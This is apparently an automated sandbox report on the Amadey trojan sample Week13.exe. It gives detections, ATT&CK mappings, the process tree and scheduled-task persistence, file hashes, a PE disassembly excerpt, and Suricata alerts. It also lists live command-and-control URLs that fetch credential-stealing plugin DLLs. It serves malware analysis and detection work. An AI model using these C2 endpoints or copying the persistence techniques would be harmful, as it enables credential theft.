                  Source: Yara matchFile source: 00000011.00000002.3259452857.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000000.2068747205.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote ServicesData from Local System1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		21
                  Virtualization/Sandbox Evasion                  		LSASS Memory21
                  Virtualization/Sandbox Evasion                  		Remote Desktop ProtocolData from Removable Media2
                  Non-Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Services File Permissions Weakness                  		1
                  Registry Run Keys / Startup Folder                  		11
                  Process Injection                  		Security Account Manager1
                  Application Window Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive12
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  DLL Side-Loading                  		1
                  Services File Permissions Weakness                  		1
                  Services File Permissions Weakness                  		NTDS1
                  File and Directory Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		LSA Secrets12
                  System Information Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561581 Sample: Week13.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Antivirus detection for URL or domain 2->45 47 7 other signatures 2->47 8 Week13.exe 4 2->8         started        11 oneetx.exe 2->11         started        13 oneetx.exe 2->13         started        15 3 other processes 2->15 process3 file4 35 C:\Users\user\AppData\Local\...\oneetx.exe, PE32 8->35 dropped 37 C:\Users\user\...\oneetx.exe:Zone.Identifier, ASCII 8->37 dropped 17 oneetx.exe 17 8->17         started        process5 dnsIp6 39 193.3.19.154, 49704, 49705, 49706 ARNES-NETAcademicandResearchNetworkofSloveniaSI Denmark 17->39 49 Antivirus detection for dropped file 17->49 51 Multi AV Scanner detection for dropped file 17->51 53 Creates an undocumented autostart registry key 17->53 55 2 other signatures 17->55 21 cmd.exe 1 17->21         started        23 schtasks.exe 1 17->23         started        signatures7 process8 process9 25 conhost.exe 21->25         started        27 cmd.exe 1 21->27         started        29 cacls.exe 1 21->29         started        33 4 other processes 21->33 31 conhost.exe 23->31         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Week13.exe92%ReversingLabsWin32.Trojan.Amadey
                  Week13.exe100%AviraHEUR/AGEN.1317762
                  Week13.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe100%AviraHEUR/AGEN.1317762
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe92%ReversingLabsWin32.Trojan.Amadey

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpc100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpd100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phppdR100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phppd100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpe5a2ab05100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dllx100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dll100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/clip64.dllYS2100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpt100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpded100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/clip64.dll100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://193.3.19.154/store/games/index.phptrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=Noneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phpe5a2ab05oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dllxoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dlloneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phppdoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phpconeetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phpdoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phppdRoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/Plugins/clip64.dllYS2oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phpdedoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/Plugins/clip64.dlloneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://193.3.19.154/store/games/index.phptoneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  193.3.19.154
                  		unknownDenmark
                  		2107ARNES-NETAcademicandResearchNetworkofSloveniaSItrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1561581
                  Start date and time:2024-11-23 20:52:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 13s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Week13.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.winEXE@26/6@0/1
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Week13.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  14:52:58API Interceptor10376866x Sleep call for process: oneetx.exe modified
                  20:52:57Task SchedulerRun new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.3.19.154HRU6b08mmd.exeGet hashmaliciousAmadey, Healer AV Disabler, PureLog Stealer, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  V4D7O37Q2C.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  TEpJB9Z7uL.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  hd6tZze1Cp.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  yab5PS1Mst.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  JeGitbTYgL.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ARNES-NETAcademicandResearchNetworkofSloveniaSI1Sj5F6P4nv.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  5LEXIucyEP.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  44qLDKzsfO.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  urkOkB0BdX.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  8F0oMWUhg7.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  botx.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 95.87.151.60
                  yakuza.mips.elfGet hashmaliciousUnknownBrowse
                  • 194.249.92.194
                  HRU6b08mmd.exeGet hashmaliciousAmadey, Healer AV Disabler, PureLog Stealer, RedLineBrowse
                  • 193.3.19.154

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe

                  Download File
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):209950
                  Entropy (8bit):6.342521487985493
                  Encrypted:false
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  MD5:A1B8FA53A47B1991EE76A46EE8685B7D
                  SHA1:4002A9CFFCDE9F7F44633457457792564A63BF5D
                  SHA-256:E472FD69B5A891059F44206124BAF829CB7583890E2C8E288E311359A2249871
                  SHA-512:F685FEF174DED44E2ECA9DF2F75F858611B45672E4DE5D81C868BB7441F476BC20AB8421AE48E2D004B960672C35190C2F4F6B9975A67596DE204918C6E52613
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 92%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L.....Bd.................t........../U............@.......................................@.....................................d....@.......................P... ..`...p...................t...........@............................................text...-r.......t.................. ..`.rdata..t|.......~...x..............@..@.data...('..........................@....rsrc........@......................@..@.reloc... ...P..."..................@..B........................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0

                  \Device\ConDrv

                  Download File
                  Process:C:\Windows\SysWOW64\cacls.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):15
                  Entropy (8bit):3.240223928941852
                  Encrypted:false
                  SSDEEP:3:o3F:o1
                  MD5:509B054634B6DE74F111C3E646BC80FD
                  SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                  SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                  SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                  Malicious:false
                  Preview:processed dir:

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.342521487985493
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Week13.exe
                  File size:209'950 bytes
                  MD5:a1b8fa53a47b1991ee76a46ee8685b7d
                  SHA1:4002a9cffcde9f7f44633457457792564a63bf5d
                  SHA256:e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871
                  SHA512:f685fef174ded44e2eca9df2f75f858611b45672e4de5d81c868bb7441f476bc20ab8421ae48e2d004b960672c35190c2f4f6b9975a67596de204918c6e52613
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  TLSH:F524F6257D12C032D561A1B619F5BFF2C59CA828A7B049DB7B800F77DA122F73960E39
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o.................

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x41552f
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6442E0B0 [Fri Apr 21 19:14:56 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:f8cc61ade86cb7277d0ab974de6323cb

                  Entrypoint Preview

                  Instruction
                  call 00007F4174B0CD79h
                  jmp 00007F4174B0C769h
                  jmp 00007F4174B0F8B9h
                  push ebp
                  mov ebp, esp
                  sub esp, 00000324h
                  push ebx
                  push 00000017h
                  call 00007F4174B1B8C9h
                  test eax, eax
                  je 00007F4174B0C8F7h
                  mov ecx, dword ptr [ebp+08h]
                  int 29h
                  push 00000003h
                  call 00007F4174B0CA9Bh
                  mov dword ptr [esp], 000002CCh
                  lea eax, dword ptr [ebp-00000324h]
                  push 00000000h
                  push eax
                  call 00007F4174B0D241h
                  add esp, 0Ch
                  mov dword ptr [ebp-00000274h], eax
                  mov dword ptr [ebp-00000278h], ecx
                  mov dword ptr [ebp-0000027Ch], edx
                  mov dword ptr [ebp-00000280h], ebx
                  mov dword ptr [ebp-00000284h], esi
                  mov dword ptr [ebp-00000288h], edi
                  mov word ptr [ebp-0000025Ch], ss
                  mov word ptr [ebp-00000268h], cs
                  mov word ptr [ebp-0000028Ch], ds
                  mov word ptr [ebp-00000290h], es
                  mov word ptr [ebp-00000294h], fs
                  mov word ptr [ebp-00000298h], gs
                  pushfd
                  pop dword ptr [ebp-00000264h]
                  mov eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-0000026Ch], eax
                  lea eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-00000260h], eax
                  mov dword ptr [ebp-00000324h], 00010001h
                  mov eax, dword ptr [eax-04h]
                  push 00000050h
                  mov dword ptr [ebp-00000270h], eax
                  lea eax, dword ptr [ebp-58h]

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x300d80x64.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x208c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2f3600x70.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x2f4740x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f3d00x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x290000x204.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x2722d0x27400f8a1f275d950abfb13b70d936b801360False0.4442426353503185data6.4362141478020645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x290000x7c740x7e00a9c9e415c77aeb6ff53c4ca6792ae320False0.4195808531746032data4.991773718102028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x310000x27280x1800214e19b3a3a6d8354fa90e8a17cf746eFalse0.08658854166666667data1.3673078527283469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x340000x1e00x2001b99276507c6356b24a31f63887375dfFalse0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x350000x208c0x22001f9afe88c86e7b78ae326a57253f65d5False0.7651654411764706data6.522595049005223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x340600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                  Imports

                  DLLImport
                  KERNEL32.dllGetFileAttributesA, CreateFileA, CloseHandle, GetSystemInfo, CreateThread, HeapAlloc, GetThreadContext, GetProcAddress, VirtualAllocEx, LocalFree, GetLastError, ReadProcessMemory, GetProcessHeap, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, SetEndOfFile, SetFilePointerEx, GetTempPathA, Sleep, SetCurrentDirectoryA, GetModuleHandleA, GetComputerNameExW, ResumeThread, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, HeapFree, WriteProcessMemory, GetModuleFileNameA, RemoveDirectoryA, ReadFile, HeapReAlloc, HeapSize, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, SetLastError, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, CompareStringW, DecodePointer
                  ADVAPI32.dllRegCloseKey, RegQueryValueExA, GetUserNameA, RegSetValueExA, RegOpenKeyExA, ConvertSidToStringSidW, GetUserNameW, LookupAccountNameW
                  SHELL32.dllSHGetFolderPathA, ShellExecuteA, SHFileOperationA
                  WININET.dllHttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, InternetOpenW, InternetOpenUrlA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-11-23T20:52:56.688685+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550036193.3.19.15480TCP
                  2024-11-23T20:52:56.688685+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550036193.3.19.15480TCP
                  2024-11-23T20:53:04.143083+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549705193.3.19.15480TCP
                  2024-11-23T20:53:04.143083+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549705193.3.19.15480TCP
                  2024-11-23T20:53:04.143141+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549704193.3.19.15480TCP
                  2024-11-23T20:53:08.382363+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549706193.3.19.15480TCP
                  2024-11-23T20:53:08.382363+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549706193.3.19.15480TCP
                  2024-11-23T20:53:12.626276+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549708193.3.19.15480TCP
                  2024-11-23T20:53:12.626323+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549707193.3.19.15480TCP
                  2024-11-23T20:53:12.626323+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549707193.3.19.15480TCP
                  2024-11-23T20:53:16.860879+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549709193.3.19.15480TCP
                  2024-11-23T20:53:16.860879+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549709193.3.19.15480TCP
                  2024-11-23T20:53:21.095122+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549714193.3.19.15480TCP
                  2024-11-23T20:53:21.095201+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549712193.3.19.15480TCP
                  2024-11-23T20:53:21.095201+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549712193.3.19.15480TCP
                  2024-11-23T20:53:25.313904+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549722193.3.19.15480TCP
                  2024-11-23T20:53:25.313904+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549722193.3.19.15480TCP
                  2024-11-23T20:53:29.579645+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549735193.3.19.15480TCP
                  2024-11-23T20:53:29.579693+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549733193.3.19.15480TCP
                  2024-11-23T20:53:29.579693+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549733193.3.19.15480TCP
                  2024-11-23T20:53:33.829480+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549741193.3.19.15480TCP
                  2024-11-23T20:53:33.829480+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549741193.3.19.15480TCP
                  2024-11-23T20:53:38.073084+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549752193.3.19.15480TCP
                  2024-11-23T20:53:38.073084+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549752193.3.19.15480TCP
                  2024-11-23T20:53:38.073133+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549754193.3.19.15480TCP
                  2024-11-23T20:53:42.313889+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549764193.3.19.15480TCP
                  2024-11-23T20:53:42.313889+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549764193.3.19.15480TCP
                  2024-11-23T20:53:46.532660+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549775193.3.19.15480TCP
                  2024-11-23T20:53:46.532660+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549775193.3.19.15480TCP
                  2024-11-23T20:53:46.532797+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549776193.3.19.15480TCP
                  2024-11-23T20:53:50.782734+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549787193.3.19.15480TCP
                  2024-11-23T20:53:50.782734+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549787193.3.19.15480TCP
                  2024-11-23T20:53:55.042480+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549794193.3.19.15480TCP
                  2024-11-23T20:53:55.042480+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549794193.3.19.15480TCP
